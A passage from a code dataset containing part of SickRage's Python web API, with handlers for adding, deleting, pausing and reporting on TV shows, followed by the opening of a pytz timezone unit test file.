"location": {"desc": "The path to the folder where the show should be created"},
"archive": {"desc": "The archive quality of the show"},
"flatten_folders": {"desc": "True to flatten the show folder, False otherwise"},
"status": {"desc": "The status of missing episodes"},
"lang": {"desc": "The 2-letter language code of the desired show"},
"subtitles": {"desc": "True to search for subtitles, False otherwise"},
"anime": {"desc": "True to mark the show as an anime, False otherwise"},
"scene": {"desc": "True if episodes search should be made by scene numbering, False otherwise"},
"future_status": {"desc": "The status of future episodes"},
"archive_firstmatch": {"desc": "True if episodes should be archived when first match is downloaded, False otherwise"},
}
}
def __init__(self, args, kwargs):
self.valid_languages = sickbeard.indexerApi().config['langabbv_to_id']
# required
self.indexerid, args = self.check_params(args, kwargs, "indexerid", None, True, "int", [])
# optional
self.location, args = self.check_params(args, kwargs, "location", None, False, "string", [])
self.initial, args = self.check_params(args, kwargs, "initial", None, False, "list",
["sdtv", "sddvd", "hdtv", "rawhdtv", "fullhdtv", "hdwebdl",
"fullhdwebdl", "hdbluray", "fullhdbluray", "unknown"])
self.archive, args = self.check_params(args, kwargs, "archive", None, False, "list",
["sddvd", "hdtv", "rawhdtv", "fullhdtv", "hdwebdl",
"fullhdwebdl", "hdbluray", "fullhdbluray"])
self.flatten_folders, args = self.check_params(args, kwargs, "flatten_folders",
bool(sickbeard.FLATTEN_FOLDERS_DEFAULT), False, "bool", [])
self.status, args = self.check_params(args, kwargs, "status", None, False, "string",
["wanted", "skipped", "ignored"])
self.lang, args = self.check_params(args, kwargs, "lang", sickbeard.INDEXER_DEFAULT_LANGUAGE, False, "string",
self.valid_languages.keys())
self.subtitles, args = self.check_params(args, kwargs, "subtitles", bool(sickbeard.USE_SUBTITLES),
False, "bool", [])
self.anime, args = self.check_params(args, kwargs, "anime", bool(sickbeard.ANIME_DEFAULT), False,
"bool", [])
self.scene, args = self.check_params(args, kwargs, "scene", bool(sickbeard.SCENE_DEFAULT), False,
"bool", [])
self.future_status, args = self.check_params(args, kwargs, "future_status", None, False, "string",
["wanted", "skipped", "ignored"])
self.archive_firstmatch, args = self.check_params(args, kwargs, "archive_firstmatch",
bool(sickbeard.ARCHIVE_DEFAULT), False, "bool", [])
# super, missing, help
ApiCall.__init__(self, args, kwargs)
def run(self):
""" Add a new show to SickRage """
showObj = sickbeard.helpers.findCertainShow(sickbeard.showList, int(self.indexerid))
if showObj:
return _responds(RESULT_FAILURE, msg="An existing indexerid already exists in database")
if not self.location:
if sickbeard.ROOT_DIRS != "":
root_dirs = sickbeard.ROOT_DIRS.split('|')
root_dirs.pop(0)
default_index = int(sickbeard.ROOT_DIRS.split('|')[0])
self.location = root_dirs[default_index]
else:
return _responds(RESULT_FAILURE, msg="Root directory is not set, please provide a location")
if not ek(os.path.isdir, self.location):
return _responds(RESULT_FAILURE, msg="'" + self.location + "' is not a valid location")
quality_map = {'sdtv': Quality.SDTV,
'sddvd': Quality.SDDVD,
'hdtv': Quality.HDTV,
'rawhdtv': Quality.RAWHDTV,
'fullhdtv': Quality.FULLHDTV,
'hdwebdl': Quality.HDWEBDL,
'fullhdwebdl': Quality.FULLHDWEBDL,
'hdbluray': Quality.HDBLURAY,
'fullhdbluray': Quality.FULLHDBLURAY,
'unknown': Quality.UNKNOWN}
# use default quality as a failsafe
newQuality = int(sickbeard.QUALITY_DEFAULT)
iqualityID = []
aqualityID = []
if self.initial:
for quality in self.initial:
iqualityID.append(quality_map[quality])
if self.archive:
for quality in self.archive:
aqualityID.append(quality_map[quality])
if iqualityID or aqualityID:
newQuality = Quality.combineQualities(iqualityID, aqualityID)
# use default status as a failsafe
newStatus = sickbeard.STATUS_DEFAULT
if self.status:
# convert the string status to a int
for status in statusStrings.statusStrings:
if statusStrings[status].lower() == str(self.status).lower():
self.status = status
break
# TODO: check if obsolete
if not self.status in statusStrings.statusStrings:
raise ApiError("Invalid Status")
# only allow the status options we want
if int(self.status) not in (WANTED, SKIPPED, IGNORED):
return _responds(RESULT_FAILURE, msg="Status prohibited")
newStatus = self.status
# use default status as a failsafe
default_ep_status_after = sickbeard.STATUS_DEFAULT_AFTER
if self.future_status:
# convert the string status to a int
for status in statusStrings.statusStrings:
if statusStrings[status].lower() == str(self.future_status).lower():
self.future_status = status
break
# TODO: check if obsolete
if not self.future_status in statusStrings.statusStrings:
raise ApiError("Invalid Status")
# only allow the status options we want
if int(self.future_status) not in (WANTED, SKIPPED, IGNORED):
return _responds(RESULT_FAILURE, msg="Status prohibited")
default_ep_status_after = self.future_status
indexerName = None
indexerResult = CMD_SickBeardSearchIndexers([], {indexer_ids[self.indexer]: self.indexerid}).run()
if indexerResult['result'] == result_type_map[RESULT_SUCCESS]:
if not indexerResult['data']['results']:
return _responds(RESULT_FAILURE, msg="Empty results returned, check indexerid and try again")
if len(indexerResult['data']['results']) == 1 and 'name' in indexerResult['data']['results'][0]:
indexerName = indexerResult['data']['results'][0]['name']
if not indexerName:
return _responds(RESULT_FAILURE, msg="Unable to retrieve information from indexer")
# set indexer for found show so we can pass it along
indexer = indexerResult['data']['results'][0]['indexer']
# moved the logic check to the end in an attempt to eliminate empty directory being created from previous errors
showPath = ek(os.path.join, self.location, helpers.sanitizeFileName(indexerName))
# don't create show dir if config says not to
if sickbeard.ADD_SHOWS_WO_DIR:
logger.log(u"Skipping initial creation of " + showPath + " due to config.ini setting")
else:
dir_exists = helpers.makeDir(showPath)
if not dir_exists:
logger.log(u"API :: Unable to create the folder " + showPath + ", can't add the show", logger.ERROR)
return _responds(RESULT_FAILURE, {"path": showPath},
"Unable to create the folder " + showPath + ", can't add the show")
else:
helpers.chmodAsParent(showPath)
sickbeard.showQueueScheduler.action.addShow(int(indexer), int(self.indexerid), showPath, newStatus,
newQuality,
int(self.flatten_folders), self.lang, self.subtitles, self.anime,
self.scene, default_status_after=default_ep_status_after, archive=self.archive_firstmatch) # @UndefinedVariable
return _responds(RESULT_SUCCESS, {"name": indexerName}, indexerName + " has been queued to be added")
class CMD_ShowCache(ApiCall):
_help = {
"desc": "Check SickRage's cache to see if the images (poster, banner, fanart) for a show are valid",
"requiredParameters": {
"indexerid": {"desc": "Unique ID of a show"},
},
"optionalParameters": {
"tvdbid": {"desc": "thetvdb.com unique ID of a show"},
}
}
def __init__(self, args, kwargs):
# required
self.indexerid, args = self.check_params(args, kwargs, "indexerid", None, True, "int", [])
# optional
# super, missing, help
ApiCall.__init__(self, args, kwargs)
def run(self):
""" Check SickRage's cache to see if the images (poster, banner, fanart) for a show are valid """
showObj = sickbeard.helpers.findCertainShow(sickbeard.showList, int(self.indexerid))
if not showObj:
return _responds(RESULT_FAILURE, msg="Show not found")
# TODO: catch if cache dir is missing/invalid.. so it doesn't break show/show.cache
# return {"poster": 0, "banner": 0}
cache_obj = image_cache.ImageCache()
has_poster = 0
has_banner = 0
if ek(os.path.isfile, cache_obj.poster_path(showObj.indexerid)):
has_poster = 1
if ek(os.path.isfile, cache_obj.banner_path(showObj.indexerid)):
has_banner = 1
return _responds(RESULT_SUCCESS, {"poster": has_poster, "banner": has_banner})
class CMD_ShowDelete(ApiCall):
_help = {
"desc": "Delete a show in SickRage",
"requiredParameters": {
"indexerid": {"desc": "Unique ID of a show"},
},
"optionalParameters": {
"tvdbid": {"desc": "thetvdb.com unique ID of a show"},
"removefiles": {
"desc": "True to delete the files associated with the show, False otherwise. This can not be undone!"
},
}
}
def __init__(self, args, kwargs):
# required
self.indexerid, args = self.check_params(args, kwargs, "indexerid", None, True, "int", [])
# optional
self.removefiles, args = self.check_params(args, kwargs, "removefiles", False, False, "bool", [])
# super, missing, help
ApiCall.__init__(self, args, kwargs)
def run(self):
""" Delete a show in SickRage """
error, show = Show.delete(self.indexerid, self.removefiles)
if error is not None:
return _responds(RESULT_FAILURE, msg=error)
return _responds(RESULT_SUCCESS, msg='%s has been queued to be deleted' % show.name)
class CMD_ShowGetQuality(ApiCall):
_help = {
"desc": "Get the quality setting of a show",
"requiredParameters": {
"indexerid": {"desc": "Unique ID of a show"},
},
"optionalParameters": {
"tvdbid": {"desc": "thetvdb.com unique ID of a show"},
}
}
def __init__(self, args, kwargs):
# required
self.indexerid, args = self.check_params(args, kwargs, "indexerid", None, True, "int", [])
# optional
# super, missing, help
ApiCall.__init__(self, args, kwargs)
def run(self):
""" Get the quality setting of a show """
showObj = sickbeard.helpers.findCertainShow(sickbeard.showList, int(self.indexerid))
if not showObj:
return _responds(RESULT_FAILURE, msg="Show not found")
anyQualities, bestQualities = _mapQuality(showObj.quality)
return _responds(RESULT_SUCCESS, {"initial": anyQualities, "archive": bestQualities})
class CMD_ShowGetPoster(ApiCall):
_help = {
"desc": "Get the poster of a show",
"requiredParameters": {
"indexerid": {"desc": "Unique ID of a show"},
},
"optionalParameters": {
"tvdbid": {"desc": "thetvdb.com unique ID of a show"},
}
}
def __init__(self, args, kwargs):
# required
self.indexerid, args = self.check_params(args, kwargs, "indexerid", None, True, "int", [])
# optional
# super, missing, help
ApiCall.__init__(self, args, kwargs)
def run(self):
""" Get the poster a show """
return {
'outputType': 'image',
'image': ShowPoster(self.indexerid),
}
class CMD_ShowGetBanner(ApiCall):
_help = {
"desc": "Get the banner of a show",
"requiredParameters": {
"indexerid": {"desc": "Unique ID of a show"},
},
"optionalParameters": {
"tvdbid": {"desc": "thetvdb.com unique ID of a show"},
}
}
def __init__(self, args, kwargs):
# required
self.indexerid, args = self.check_params(args, kwargs, "indexerid", None, True, "int", [])
# optional
# super, missing, help
ApiCall.__init__(self, args, kwargs)
def run(self):
""" Get the banner of a show """
return {
'outputType': 'image',
'image': ShowBanner(self.indexerid),
}
class CMD_ShowGetNetworkLogo(ApiCall):
_help = {
"desc": "Get the network logo of a show",
"requiredParameters": {
"indexerid": {"desc": "Unique ID of a show"},
},
"optionalParameters": {
"tvdbid": {"desc": "thetvdb.com unique ID of a show"},
}
}
def __init__(self, args, kwargs):
# required
self.indexerid, args = self.check_params(args, kwargs, "indexerid", None, True, "int", [])
# optional
# super, missing, help
ApiCall.__init__(self, args, kwargs)
def run(self):
"""
:return: Get the network logo of a show
"""
return {
'outputType': 'image',
'image': ShowNetworkLogo(self.indexerid),
}
class CMD_ShowGetFanArt(ApiCall):
_help = {
"desc": "Get the fan art of a show",
"requiredParameters": {
"indexerid": {"desc": "Unique ID of a show"},
},
"optionalParameters": {
"tvdbid": {"desc": "thetvdb.com unique ID of a show"},
}
}
def __init__(self, args, kwargs):
# required
self.indexerid, args = self.check_params(args, kwargs, "indexerid", None, True, "int", [])
# optional
# super, missing, help
ApiCall.__init__(self, args, kwargs)
def run(self):
""" Get the fan art of a show """
return {
'outputType': 'image',
'image': ShowFanArt(self.indexerid),
}
class CMD_ShowPause(ApiCall):
_help = {
"desc": "Pause or unpause a show",
"requiredParameters": {
"indexerid": {"desc": "Unique ID of a show"},
},
"optionalParameters": {
"tvdbid": {"desc": "thetvdb.com unique ID of a show"},
"pause": {"desc": "True to pause the show, False otherwise"},
}
}
def __init__(self, args, kwargs):
# required
self.indexerid, args = self.check_params(args, kwargs, "indexerid", None, True, "int", [])
# optional
self.pause, args = self.check_params(args, kwargs, "pause", False, False, "bool", [])
# super, missing, help
ApiCall.__init__(self, args, kwargs)
def run(self):
""" Pause or unpause a show """
error, show = Show.pause(self.indexerid, self.pause)
if error is not None:
return _responds(RESULT_FAILURE, msg=error)
return _responds(RESULT_SUCCESS, msg='%s has been %s' % (show.name, ('resumed', 'paused')[show.paused]))
class CMD_ShowRefresh(ApiCall):
_help = {
"desc": "Refresh a show in SickRage",
"requiredParameters": {
"indexerid": {"desc": "Unique ID of a show"},
},
"optionalParameters": {
"tvdbid": {"desc": "thetvdb.com unique ID of a show"},
}
}
def __init__(self, args, kwargs):
# required
self.indexerid, args = self.check_params(args, kwargs, "indexerid", None, True, "int", [])
# optional
# super, missing, help
ApiCall.__init__(self, args, kwargs)
def run(self):
""" Refresh a show in SickRage """
error, show = Show.refresh(self.indexerid)
if error is not None:
return _responds(RESULT_FAILURE, msg=error)
return _responds(RESULT_SUCCESS, msg='%s has queued to be refreshed' % show.name)
class CMD_ShowSeasonList(ApiCall):
_help = {
"desc": "Get the list of seasons of a show",
"requiredParameters": {
"indexerid": {"desc": "Unique ID of a show"},
},
"optionalParameters": {
"tvdbid": {"desc": "thetvdb.com unique ID of a show"},
"sort": {"desc": "Return the seasons in ascending or descending order"}
}
}
def __init__(self, args, kwargs):
# required
self.indexerid, args = self.check_params(args, kwargs, "indexerid", None, True, "int", [])
# optional
self.sort, args = self.check_params(args, kwargs, "sort", "desc", False, "string", ["asc", "desc"])
# super, missing, help
ApiCall.__init__(self, args, kwargs)
def run(self):
""" Get the list of seasons of a show """
showObj = sickbeard.helpers.findCertainShow(sickbeard.showList, int(self.indexerid))
if not showObj:
return _responds(RESULT_FAILURE, msg="Show not found")
myDB = db.DBConnection(row_type="dict")
if self.sort == "asc":
sqlResults = myDB.select("SELECT DISTINCT season FROM tv_episodes WHERE showid = ? ORDER BY season ASC",
[self.indexerid])
else:
sqlResults = myDB.select("SELECT DISTINCT season FROM tv_episodes WHERE showid = ? ORDER BY season DESC",
[self.indexerid])
seasonList = [] # a list with all season numbers
for row in sqlResults:
seasonList.append(int(row["season"]))
return _responds(RESULT_SUCCESS, seasonList)
class CMD_ShowSeasons(ApiCall):
_help = {
"desc": "Get the list of episodes for one or all seasons of a show",
"requiredParameters": {
"indexerid": {"desc": "Unique ID of a show"},
},
"optionalParameters": {
"tvdbid": {"desc": "thetvdb.com unique ID of a show"},
"season": {"desc": "The season number"},
}
}
def __init__(self, args, kwargs):
# required
self.indexerid, args = self.check_params(args, kwargs, "indexerid", None, True, "int", [])
# optional
self.season, args = self.check_params(args, kwargs, "season", None, False, "int", [])
# super, missing, help
ApiCall.__init__(self, args, kwargs)
def run(self):
""" Get the list of episodes for one or all seasons of a show """
showObj = sickbeard.helpers.findCertainShow(sickbeard.showList, int(self.indexerid))
if not showObj:
return _responds(RESULT_FAILURE, msg="Show not found")
myDB = db.DBConnection(row_type="dict")
if self.season == None:
sqlResults = myDB.select(
"SELECT name, episode, airdate, status, release_name, season, location, file_size, subtitles FROM tv_episodes WHERE showid = ?",
[self.indexerid])
seasons = {}
for row in sqlResults:
status, quality = Quality.splitCompositeStatus(int(row["status"]))
row["status"] = _get_status_Strings(status)
row["quality"] = get_quality_string(quality)
dtEpisodeAirs = sbdatetime.sbdatetime.convert_to_setting(
network_timezones.parse_date_time(row['airdate'], showObj.airs, showObj.network))
row['airdate'] = sbdatetime.sbdatetime.sbfdate(dtEpisodeAirs, d_preset=dateFormat)
curSeason = int(row["season"])
curEpisode = int(row["episode"])
del row["season"]
del row["episode"]
if not curSeason in seasons:
seasons[curSeason] = {}
seasons[curSeason][curEpisode] = row
else:
sqlResults = myDB.select(
"SELECT name, episode, airdate, status, location, file_size, release_name, subtitles FROM tv_episodes WHERE showid = ? AND season = ?",
[self.indexerid, self.season])
if len(sqlResults) is 0:
return _responds(RESULT_FAILURE, msg="Season not found")
seasons = {}
for row in sqlResults:
curEpisode = int(row["episode"])
del row["episode"]
status, quality = Quality.splitCompositeStatus(int(row["status"]))
row["status"] = _get_status_Strings(status)
row["quality"] = get_quality_string(quality)
dtEpisodeAirs = sbdatetime.sbdatetime.convert_to_setting(
network_timezones.parse_date_time(row['airdate'], showObj.airs, showObj.network))
row['airdate'] = sbdatetime.sbdatetime.sbfdate(dtEpisodeAirs, d_preset=dateFormat)
if not curEpisode in seasons:
seasons[curEpisode] = {}
seasons[curEpisode] = row
return _responds(RESULT_SUCCESS, seasons)
class CMD_ShowSetQuality(ApiCall):
_help = {
"desc": "Set the quality setting of a show. If no quality is provided, the default user setting is used.",
"requiredParameters": {
"indexerid": {"desc": "Unique ID of a show"},
},
"optionalParameters": {
"tvdbid": {"desc": "thetvdb.com unique ID of a show"},
"initial": {"desc": "The initial quality of the show"},
"archive": {"desc": "The archive quality of the show"},
}
}
def __init__(self, args, kwargs):
# required
self.indexerid, args = self.check_params(args, kwargs, "indexerid", None, True, "int", [])
# optional
# this for whatever reason removes hdbluray not sdtv... which is just wrong. reverting to previous code.. plus we didnt use the new code everywhere.
# self.archive, args = self.check_params(args, kwargs, "archive", None, False, "list", _getQualityMap().values()[1:])
self.initial, args = self.check_params(args, kwargs, "initial", None, False, "list",
["sdtv", "sddvd", "hdtv", "rawhdtv", "fullhdtv", "hdwebdl",
"fullhdwebdl", "hdbluray", "fullhdbluray", "unknown"])
self.archive, args = self.check_params(args, kwargs, "archive", None, False, "list",
["sddvd", "hdtv", "rawhdtv", "fullhdtv", "hdwebdl",
"fullhdwebdl",
"hdbluray", "fullhdbluray"])
# super, missing, help
ApiCall.__init__(self, args, kwargs)
def run(self):
""" Set the quality setting of a show. If no quality is provided, the default user setting is used. """
showObj = sickbeard.helpers.findCertainShow(sickbeard.showList, int(self.indexerid))
if not showObj:
return _responds(RESULT_FAILURE, msg="Show not found")
quality_map = {'sdtv': Quality.SDTV,
'sddvd': Quality.SDDVD,
'hdtv': Quality.HDTV,
'rawhdtv': Quality.RAWHDTV,
'fullhdtv': Quality.FULLHDTV,
'hdwebdl': Quality.HDWEBDL,
'fullhdwebdl': Quality.FULLHDWEBDL,
'hdbluray': Quality.HDBLURAY,
'fullhdbluray': Quality.FULLHDBLURAY,
'unknown': Quality.UNKNOWN}
# use default quality as a failsafe
newQuality = int(sickbeard.QUALITY_DEFAULT)
iqualityID = []
aqualityID = []
if self.initial:
for quality in self.initial:
iqualityID.append(quality_map[quality])
if self.archive:
for quality in self.archive:
aqualityID.append(quality_map[quality])
if iqualityID or aqualityID:
newQuality = Quality.combineQualities(iqualityID, aqualityID)
showObj.quality = newQuality
return _responds(RESULT_SUCCESS,
msg=showObj.name + " quality has been changed to " + get_quality_string(showObj.quality))
class CMD_ShowStats(ApiCall):
_help = {
"desc": "Get episode statistics for a given show",
"requiredParameters": {
"indexerid": {"desc": "Unique ID of a show"},
},
"optionalParameters": {
"tvdbid": {"desc": "thetvdb.com unique ID of a show"},
}
}
def __init__(self, args, kwargs):
# required
self.indexerid, args = self.check_params(args, kwargs, "indexerid", None, True, "int", [])
# optional
# super, missing, help
ApiCall.__init__(self, args, kwargs)
def run(self):
""" Get episode statistics for a given show """
showObj = sickbeard.helpers.findCertainShow(sickbeard.showList, int(self.indexerid))
if not showObj:
return _responds(RESULT_FAILURE, msg="Show not found")
# show stats
episode_status_counts_total = {}
episode_status_counts_total["total"] = 0
for status in statusStrings.statusStrings.keys():
if status in [UNKNOWN, DOWNLOADED, SNATCHED, SNATCHED_PROPER, ARCHIVED]:
continue
episode_status_counts_total[status] = 0
# add all the downloaded qualities
episode_qualities_counts_download = {}
episode_qualities_counts_download["total"] = 0
for statusCode in Quality.DOWNLOADED + Quality.ARCHIVED:
status, quality = Quality.splitCompositeStatus(statusCode)
if quality in [Quality.NONE]:
continue
episode_qualities_counts_download[statusCode] = 0
# add all snatched qualities
episode_qualities_counts_snatch = {}
episode_qualities_counts_snatch["total"] = 0
for statusCode in Quality.SNATCHED + Quality.SNATCHED_PROPER:
status, quality = Quality.splitCompositeStatus(statusCode)
if quality in [Quality.NONE]:
continue
episode_qualities_counts_snatch[statusCode] = 0
myDB = db.DBConnection(row_type="dict")
sqlResults = myDB.select("SELECT status, season FROM tv_episodes WHERE season != 0 AND showid = ?",
[self.indexerid])
# the main loop that goes through all episodes
for row in sqlResults:
status, quality = Quality.splitCompositeStatus(int(row["status"]))
episode_status_counts_total["total"] += 1
if status in Quality.DOWNLOADED + Quality.ARCHIVED:
episode_qualities_counts_download["total"] += 1
episode_qualities_counts_download[int(row["status"])] += 1
elif status in Quality.SNATCHED + Quality.SNATCHED_PROPER:
episode_qualities_counts_snatch["total"] += 1
episode_qualities_counts_snatch[int(row["status"])] += 1
elif status == 0: # we dont count NONE = 0 = N/A
pass
else:
episode_status_counts_total[status] += 1
# the outgoing container
episodes_stats = {}
episodes_stats["downloaded"] = {}
# turning codes into strings
for statusCode in episode_qualities_counts_download:
if statusCode == "total":
episodes_stats["downloaded"]["total"] = episode_qualities_counts_download[statusCode]
continue
status, quality = Quality.splitCompositeStatus(int(statusCode))
statusString = Quality.qualityStrings[quality].lower().replace(" ", "_").replace("(", "").replace(")", "")
episodes_stats["downloaded"][statusString] = episode_qualities_counts_download[statusCode]
episodes_stats["snatched"] = {}
# truning codes into strings
# and combining proper and normal
for statusCode in episode_qualities_counts_snatch:
if statusCode == "total":
episodes_stats["snatched"]["total"] = episode_qualities_counts_snatch[statusCode]
continue
status, quality = Quality.splitCompositeStatus(int(statusCode))
statusString = Quality.qualityStrings[quality].lower().replace(" ", "_").replace("(", "").replace(")", "")
if Quality.qualityStrings[quality] in episodes_stats["snatched"]:
episodes_stats["snatched"][statusString] += episode_qualities_counts_snatch[statusCode]
else:
episodes_stats["snatched"][statusString] = episode_qualities_counts_snatch[statusCode]
# episodes_stats["total"] = {}
for statusCode in episode_status_counts_total:
if statusCode == "total":
episodes_stats["total"] = episode_status_counts_total[statusCode]
continue
status, quality = Quality.splitCompositeStatus(int(statusCode))
statusString = statusStrings.statusStrings[statusCode].lower().replace(" ", "_").replace("(", "").replace(
")", "")
episodes_stats[statusString] = episode_status_counts_total[statusCode]
return _responds(RESULT_SUCCESS, episodes_stats)
class CMD_ShowUpdate(ApiCall):
_help = {
"desc": "Update a show in SickRage",
"requiredParameters": {
"indexerid": {"desc": "Unique ID of a show"},
},
"optionalParameters": {
"tvdbid": {"desc": "thetvdb.com unique ID of a show"},
}
}
def __init__(self, args, kwargs):
# required
self.indexerid, args = self.check_params(args, kwargs, "indexerid", None, True, "int", [])
# optional
# super, missing, help
ApiCall.__init__(self, args, kwargs)
def run(self):
""" Update a show in SickRage """
showObj = sickbeard.helpers.findCertainShow(sickbeard.showList, int(self.indexerid))
if not showObj:
return _responds(RESULT_FAILURE, msg="Show not found")
try:
sickbeard.showQueueScheduler.action.updateShow(showObj, True) # @UndefinedVariable
return _responds(RESULT_SUCCESS, msg=str(showObj.name) + " has queued to be updated")
except CantUpdateShowException as e:
logger.log("API::Unable to update show: {0}".format(str(e)),logger.DEBUG)
return _responds(RESULT_FAILURE, msg="Unable to update " + str(showObj.name))
class CMD_Shows(ApiCall):
_help = {
"desc": "Get all shows in SickRage",
"optionalParameters": {
"sort": {"desc": "The sorting strategy to apply to the list of shows"},
"paused": {"desc": "True to include paused shows, False otherwise"},
},
}
def __init__(self, args, kwargs):
# required
# optional
self.sort, args = self.check_params(args, kwargs, "sort", "id", False, "string", ["id", "name"])
self.paused, args = self.check_params(args, kwargs, "paused", None, False, "bool", [])
# super, missing, help
ApiCall.__init__(self, args, kwargs)
def run(self):
""" Get all shows in SickRage """
shows = {}
for curShow in sickbeard.showList:
if self.paused is not None and bool(self.paused) != bool(curShow.paused):
continue
indexerShow = helpers.mapIndexersToShow(curShow)
showDict = {
"paused": (0, 1)[curShow.paused],
"quality": get_quality_string(curShow.quality),
"language": curShow.lang,
"air_by_date": (0, 1)[curShow.air_by_date],
"sports": (0, 1)[curShow.sports],
"anime": (0, 1)[curShow.anime],
"indexerid": curShow.indexerid,
"tvdbid": indexerShow[1],
"network": curShow.network,
"show_name": curShow.name,
"status": curShow.status,
"subtitles": (0, 1)[curShow.subtitles],
}
if curShow.nextaired:
dtEpisodeAirs = sbdatetime.sbdatetime.convert_to_setting(
network_timezones.parse_date_time(curShow.nextaired, curShow.airs, showDict['network']))
showDict['next_ep_airdate'] = sbdatetime.sbdatetime.sbfdate(dtEpisodeAirs, d_preset=dateFormat)
else:
showDict['next_ep_airdate'] = ''
showDict["cache"] = CMD_ShowCache((), {"indexerid": curShow.indexerid}).run()["data"]
if not showDict["network"]:
showDict["network"] = ""
if self.sort == "name":
shows[curShow.name] = showDict
else:
shows[curShow.indexerid] = showDict
return _responds(RESULT_SUCCESS, shows)
class CMD_ShowsStats(ApiCall):
_help = {"desc": "Get the global shows and episodes statistics"}
def __init__(self, args, kwargs):
# required
# optional
# super, missing, help
ApiCall.__init__(self, args, kwargs)
def run(self):
""" Get the global shows and episodes statistics """
stats = {}
myDB = db.DBConnection()
today = str(datetime.date.today().toordinal())
stats["shows_total"] = len(sickbeard.showList)
stats["shows_active"] = len(
[show for show in sickbeard.showList if show.paused == 0 and "Unknown" not in show.status and "Ended" not in show.status])
stats["ep_downloaded"] = myDB.select("SELECT COUNT(*) FROM tv_episodes WHERE status IN (" + ",".join(
[str(show) for show in Quality.DOWNLOADED + Quality.ARCHIVED]) + ") AND season != 0 and episode != 0 AND airdate <= " + today + "")[0][0]
stats["ep_snatched"] = myDB.select("SELECT COUNT(*) FROM tv_episodes WHERE status IN (" + ",".join(
[str(show) for show in Quality.SNATCHED + Quality.SNATCHED_PROPER]) + ") AND season != 0 and episode != 0 AND airdate <= " + today + "")[0][0]
stats["ep_total"] = myDB.select("SELECT COUNT(*) FROM tv_episodes WHERE season != 0 AND episode != 0 AND (airdate != 1 OR status IN (" + ",".join(
[str(show) for show in Quality.DOWNLOADED + Quality.SNATCHED + Quality.SNATCHED_PROPER + Quality.ARCHIVED]) + ")) AND airdate <= " + today + " AND status != " + str(IGNORED) + "")[0][0]
return _responds(RESULT_SUCCESS, stats)
# WARNING: never define a cmd call string that contains a "_" (underscore)
# this is reserved for cmd indexes used while cmd chaining
# WARNING: never define a param name that contains a "." (dot)
# this is reserved for cmd namespaces used while cmd chaining
function_mapper = {
"help": CMD_Help,
"future": CMD_ComingEpisodes,
"episode": CMD_Episode,
"episode.search": CMD_EpisodeSearch,
"episode.setstatus": CMD_EpisodeSetStatus,
"episode.subtitlesearch": CMD_SubtitleSearch,
"exceptions": CMD_Exceptions,
"history": CMD_History,
"history.clear": CMD_HistoryClear,
"history.trim": CMD_HistoryTrim,
"failed": CMD_Failed,
"backlog": CMD_Backlog,
"logs": CMD_Logs,
"sb": CMD_SickBeard,
"postprocess": CMD_PostProcess,
"sb.addrootdir": CMD_SickBeardAddRootDir,
"sb.checkversion": CMD_SickBeardCheckVersion,
"sb.checkscheduler": CMD_SickBeardCheckScheduler,
"sb.deleterootdir": CMD_SickBeardDeleteRootDir,
"sb.getdefaults": CMD_SickBeardGetDefaults,
"sb.getmessages": CMD_SickBeardGetMessages,
"sb.getrootdirs": CMD_SickBeardGetRootDirs,
"sb.pausebacklog": CMD_SickBeardPauseBacklog,
"sb.ping": CMD_SickBeardPing,
"sb.restart": CMD_SickBeardRestart,
"sb.searchindexers": CMD_SickBeardSearchIndexers,
"sb.searchtvdb": CMD_SickBeardSearchTVDB,
"sb.searchtvrage": CMD_SickBeardSearchTVRAGE,
"sb.setdefaults": CMD_SickBeardSetDefaults,
"sb.update": CMD_SickBeardUpdate,
"sb.shutdown": CMD_SickBeardShutdown,
"show": CMD_Show,
"show.addexisting": CMD_ShowAddExisting,
"show.addnew": CMD_ShowAddNew,
"show.cache": CMD_ShowCache,
"show.delete": CMD_ShowDelete,
"show.getquality": CMD_ShowGetQuality,
"show.getposter": CMD_ShowGetPoster,
"show.getbanner": CMD_ShowGetBanner,
"show.getnetworklogo": CMD_ShowGetNetworkLogo,
"show.getfanart": CMD_ShowGetFanArt,
"show.pause": CMD_ShowPause,
"show.refresh": CMD_ShowRefresh,
"show.seasonlist": CMD_ShowSeasonList,
"show.seasons": CMD_ShowSeasons,
"show.setquality": CMD_ShowSetQuality,
"show.stats": CMD_ShowStats,
"show.update": CMD_ShowUpdate,
"shows": CMD_Shows,
"shows.stats": CMD_ShowsStats
}
| WebSpider/SickRage | sickbeard/webapi.py | Python | gpl-3.0 | 117,264 |
# -*- coding: ascii -*-
import sys, os, os.path
import unittest, doctest
try:
import cPickle as pickle
except ImportError:
import pickle
from datetime import datetime, time, timedelta, tzinfo
import warnings
if __name__ == '__main__':
# Only munge path if invoked as a script. Testrunners should have setup
# the paths already
sys.path.insert(0, os.path.abspath(os.path.join(os.pardir, os.pardir)))
import pytz
from pytz import reference
from pytz.tzfile import _byte_string
from pytz.tzinfo import DstTzInfo, StaticTzInfo
# I test for expected version to ensure the correct version of pytz is
# actually being tested.
EXPECTED_VERSION='2012d'
fmt = '%Y-%m-%d %H:%M:%S %Z%z'
NOTIME = timedelta(0)
# GMT is a tzinfo.StaticTzInfo--the class we primarily want to test--while
# UTC is reference implementation. They both have the same timezone meaning.
UTC = pytz.timezone('UTC')
GMT = pytz.timezone('GMT')
assert isinstance(GMT, StaticTzInfo), 'GMT is no longer a StaticTzInfo'
def prettydt(dt):
"""datetime as a string using a known format.
We don't use strftime as it doesn't handle years earlier than 1900
per http://bugs.python.org/issue1777412
"""
if dt.utcoffset() >= timedelta(0):
offset = '+%s' % (dt.utcoffset(),)
else:
offset = '-%s' % (-1 * dt.utcoffset(),)
return '%04d-%02d-%02d %02d:%02d:%02d %s %s' % (
dt.year, dt.month, dt.day,
dt.hour, dt.minute, dt.second,
dt.tzname(), offset)
try:
unicode
except NameError:
# Python 3.x doesn't have unicode(), making writing code
# for Python 2.3 and Python 3.x a pain.
unicode = str
class BasicTest(unittest.TestCase):
def testVersion(self):
# Ensuring the correct version of pytz has been loaded
self.assertEqual(EXPECTED_VERSION, pytz.__version__,
'Incorrect pytz version loaded. Import path is stuffed '
'or this test needs updating. (Wanted %s, got %s)'
% (EXPECTED_VERSION, pytz.__version__)
)
def testGMT(self):
now = datetime.now(tz=GMT)
self.assertTrue(now.utcoffset() == NOTIME)
self.assertTrue(now.dst() == NOTIME)
self.assertTrue(now.timetuple() == now.utctimetuple())
self.assertTrue(now==now.replace(tzinfo=UTC))
def testReferenceUTC(self):
now = datetime.now(tz=UTC)
self.assertTrue(now.utcoffset() == NOTIME)
self.assertTrue(now.dst() == NOTIME)
self.assertTrue(now.timetuple() == now.utctimetuple())
def testUnknownOffsets(self):
# This tzinfo behavior is required to make
